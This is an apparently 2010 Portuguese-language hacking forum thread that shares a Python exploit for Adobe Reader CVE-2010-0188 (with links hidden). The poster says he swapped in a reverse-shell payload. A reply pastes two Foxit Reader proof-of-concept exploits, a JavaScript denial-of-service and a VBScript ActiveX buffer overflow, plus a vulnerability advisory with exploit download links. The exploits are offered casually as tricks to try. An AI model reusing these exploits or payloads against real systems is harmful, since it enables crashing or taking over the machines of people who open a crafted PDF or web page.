Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Vulnerabilidade no Adobe Reader - CVE-2010-0188

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Video Aula Vulnerabilidade no Adobe Reader - CVE-2010-0188

    Um hacker chamado villy fez um script python que vai criar um pdf que lançará calc.exe WinXP SP2 em um Box com a versão mais atualizada do Adobe Reader que e a 9.3 mas funcionar nas versões 9.1 9.2 e 9.3 do adobe reader instalado mesmo com Java desligado.
    Depois de brincar com ele que substituiu o shellcode com o Windows Shell Reverse e depois tentei em um sistema totalmente atualizado! E o que acontece?

    Exploit trabalha com Adobe Javascript desativado.
    Testado: testado com sucesso no Adobe Reader 9.1/9.2/9.3 OS Windows XP (SP2, SP3 todas as línguas), também trabalha com o plugin Adobe navegado


    Baixar:
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    Assisti on-line:
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    Script em python:
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...


    Fonte: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    Last edited by Bhior; 28-05-2010, 07:48.

    Similar Threads

  • Font Size
    #2
    Estou a algum tempo sem usar Windows XP e Adobe Reader, hehe, mais irei assistir a vídeo aula. Quando digo que vou assistir eu realmente assisto; e recomendo.

    Obrigado por compartilhar Bhior.
    Abraço.
    Mesmo longe, eu estou perto. Guia do Hacker 4ever.

    Comment


    • Font Size
      #3
      Vou assistir tbm...

      É sempre bom aprender novas 'tricks' !

      Vlw Bhior
      Te Ajudei, Gostou do Post. Agradeça Não Custa Nada !

      sigpic

      Comment


      • Font Size
        #4
        Link ta off vou aguarda você posta pra assiste online.

        Gostou do meu Post? seja educado peça


        Msn: andersondex@hotmail.com
        Skype: dex.oficial

        Comment


        • Font Size
          #5
          Atualizado, so falta eu upar o script em python.

          Comment


          • Font Size
            #6
            Conferindo

            Comment


            • Font Size
              #7
              Por isso uso o Foxit reader
              Twitter: @samukt << Siga me ;D

              Comment


              • Font Size
                #8
                Postado Originalmente por samukt Ver Post
                Por isso uso o Foxit reader
                Ingenuidade sua, foxit também possui vulnerabilidade, so que os esforços alheios são nos mais populares. Olhe uma delas Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

                Abraços []'

                Comment


                • Font Size
                  #9
                  Foxit Reader Firefox Plugin pelo que entendi este exp faz o firefox abrir o foxit e pah, Genial
                  Tem mais alguns aqui:
                  Código:
                  Title: Foxit Reader <= 3.2.1.0401 Denial Of Service Exploit
                  Date: 05/04/10
                  Author: juza - iamjuza[at]gmail[dot]com
                  Software Link: http://www.foxitsoftware.com/pdf/reader/
                  Version: All versions <= 3.2.1.0401 have the same issue
                  Tested on: Windows XP SP3 x32
                  Description: Just open the pdf and click in the button!
                  Greetz: Yux, Wisezilla, GSO, thanks for all!
                  
                  Code:
                  
                  function DoS( pdfDate ) {
                  eval("new Date(" + new Array(Number.NaN,
                  Number.NaN).toSource().replace(/[\[\]]/g, "") + ")" );
                  }
                  
                  DoS("DoS");
                  
                  
                  -------------------------
                  
                  PoC: http://www.exploit-db.com/sploits/12080.pdf
                  
                  Regards
                  
                  juza
                  Código:
                  #Vendor :www.foxitsoftware.com
                  #tested on :[windows 7]
                  #Foxit Reader Version 3.1.4.1125
                  
                  <html>
                  <object classid='clsid:05563215-225C-45EB-BB34-AFA47217B1DE' id='target' ></object>
                  <script language='vbscript'>
                  
                  targetFile = "C:\Program Files\Foxit Software\Foxit Reader\plugins\FoxitReaderOCX.ocx"
                  prototype  = "Function OpenFile ( ByVal strFilePath As String ) As Boolean"
                  memberName = "OpenFile"
                  progid     = "FOXITREADEROCXLib.FoxitReaderOCX"
                  argCount   = 1
                   
                  arg1=String(6164, "A")
                   
                  target.OpenFile arg1 
                   
                  </script>
                  Código:
                  Bugtraq ID: 36673
                  
                  Published: Oct 14 2009 12:00AM
                  Updated: Nov 19 2009 03:25PM
                  Credit: mrx
                  Vulnerable: Foxit Reader 3.1.1 Build 0928
                  Foxit Foxit Reader 3.0.2009 1301
                  Foxit Foxit Reader 3.0 Build 1817
                  Foxit Foxit Reader 3.0 Build 1506
                  Foxit Foxit Reader 3.0
                  
                  
                  Foxit Reader is prone to a remote code-execution vulnerability because is fails to properly handle certain COM objects.
                  
                  An attacker can exploit this issue by supplying a malicious PDF file or webpage. Successful exploits may allow the attacker to execute arbitrary code in the context of a user running the affected application. Failed attempts will likely result in denial-of-service conditions. 
                  
                  Exploit: http://www.exploit-db.com/sploits/2009-11-22-36668.tar
                  O ruim é que nenhum programa e seguro
                  Twitter: @samukt << Siga me ;D

                  Comment

                  X
                  Working...
                  X